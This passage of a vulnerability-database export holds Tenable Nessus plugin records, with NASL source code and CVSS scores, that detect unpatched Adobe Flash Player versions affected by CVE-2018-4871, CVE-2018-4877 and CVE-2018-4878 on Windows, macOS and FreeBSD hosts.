\"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-02\";\nkbs = make_list('4074595');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all <= 28.0.0.137\nfix = FALSE;\nif(ver_compare(ver:iver, fix:\"28.0.0.137\", strict:FALSE) <= 0)\n fix = \"28.0.0.161\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS18-02', kb:'4074595', report);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:48", "description": "Versions of Adobe Flash Player prior to 28.0.0.161 are unpatched for multiple vulnerabilities :\n\n - A vulnerability exists due to a dangling pointer in the Primetime SDK related to media player's quality of service functionality. A successful attack can lead to arbitrary code execution. (CVE-2018-4877)\n - A vulnerability exists due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. A successful attack can lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-20T00:00:00", "type": "nessus", "title": "Flash Player < 28.0.0.161 Multiple RCE (APSB18-03)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2019-04-09T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "700430.PRM", "href": "https://www.tenable.com/plugins/nnm/700430", "sourceData": "Binary data 700430.prm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:36:56", "description": "The remote Windows host is missing security update KB4056887. It is, therefore, affected by a an out-of-bounds read vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-09T00:00:00", "type": "nessus", "title": "KB4056887: Security update for Adobe Flash Player (January 2018)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS18_JAN_4056887.NASL", "href": "https://www.tenable.com/plugins/nessus/105693", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105693);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n script_xref(name:\"MSKB\", value:\"4056887\");\n script_xref(name:\"MSFT\", value:\"MS17-4056887\");\n\n script_name(english:\"KB4056887: Security update for Adobe Flash Player (January 2018)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4056887. It is,\ntherefore, affected by a an out-of-bounds read vulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n # https://support.microsoft.com/en-us/help/4056887/security-update-for-adobe-flash-player\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d0e603fd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4056887 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4871\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-01\";\nkbs = make_list('4056887');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all <= 28.0.0.126\nfix = FALSE;\nif(ver_compare(ver:iver, fix:\"28.0.0.126\", strict:FALSE) <= 0)\n fix = \"28.0.0.137\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS18-01', kb:'4056887', report);\n security_report_v4(severity:SECURITY_WARNING, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:36:55", "description": "Adobe reports :\n\n- This update resolves an out-of-bounds read vulnerability that could lead to information disclosure (CVE-2018-4871).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-10T00:00:00", "type": "nessus", "title": "FreeBSD : Flash Player -- information disclosure (9c016563-f582-11e7-b33c-6451062f0f7a)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplayer", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_9C016563F58211E7B33C6451062F0F7A.NASL", "href": "https://www.tenable.com/plugins/nessus/105712", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105712);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:47\");\n\n script_cve_id(\"CVE-2018-4871\");\n\n script_name(english:\"FreeBSD : Flash Player -- information disclosure (9c016563-f582-11e7-b33c-6451062f0f7a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\n- This update resolves an out-of-bounds read vulnerability that could\nlead to information disclosure (CVE-2018-4871).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\"\n );\n # https://vuxml.freebsd.org/freebsd/9c016563-f582-11e7-b33c-6451062f0f7a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?da36d8ea\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplayer<28.0.0.137\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:38:38", "description": "The version of Adobe Flash Player installed on the remote macOS or Mac OS X host is equal or prior to version 28.0.0.126. It is, therefore, affected by a an out-of-bounds read vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-09T00:00:00", "type": "nessus", "title": "Adobe Flash Player for Mac <= 28.0.0.126 (APSB18-01)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB18-01.NASL", "href": "https://www.tenable.com/plugins/nessus/105692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105692);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n\n script_name(english:\"Adobe Flash Player for Mac <= 28.0.0.126 (APSB18-01)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OSX host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote macOS or Mac\nOS X host is equal or prior to version 28.0.0.126. It is,\ntherefore, affected by a an out-of-bounds read vulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 28.0.0.137 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4871\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\ncutoff_version = \"28.0.0.126\";\nfix = \"28.0.0.137\";\n# We're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(severity:SECURITY_WARNING, port:0, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:38:40", "description": "The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 28.0.0.126. It is, therefore, affected by a an out-of-bounds read vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-09T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 28.0.0.126 (APSB18-01)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4871"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB18-01.NASL", "href": "https://www.tenable.com/plugins/nessus/105691", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105691);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n\n script_name(english:\"Adobe Flash Player <= 28.0.0.126 (APSB18-01)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by an out-of-bounds read vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows\nhost is equal or prior to version 28.0.0.126. It is,\ntherefore, affected by a an out-of-bounds read vulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 28.0.0.137 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4871\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if (isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (isnull(ver))\n continue;\n\n # <= 28.0.0.126\n if (ver_compare(ver:ver,fix:\"28.0.0.126\",strict:FALSE) <= 0)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"28.0.0.137\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"28.0.0.137\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if (variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 28.0.0.137\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 28.0.0.137 (Chrome PepperFlash)';\n else if (!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n security_report_v4(severity:SECURITY_WARNING, port:port, extra:info);\n\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:49:50", "description": "Versions of Adobe Flash Player prior to 28.0.0.137 are unpatched, and therefore affected by an out-of-bounds read vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": 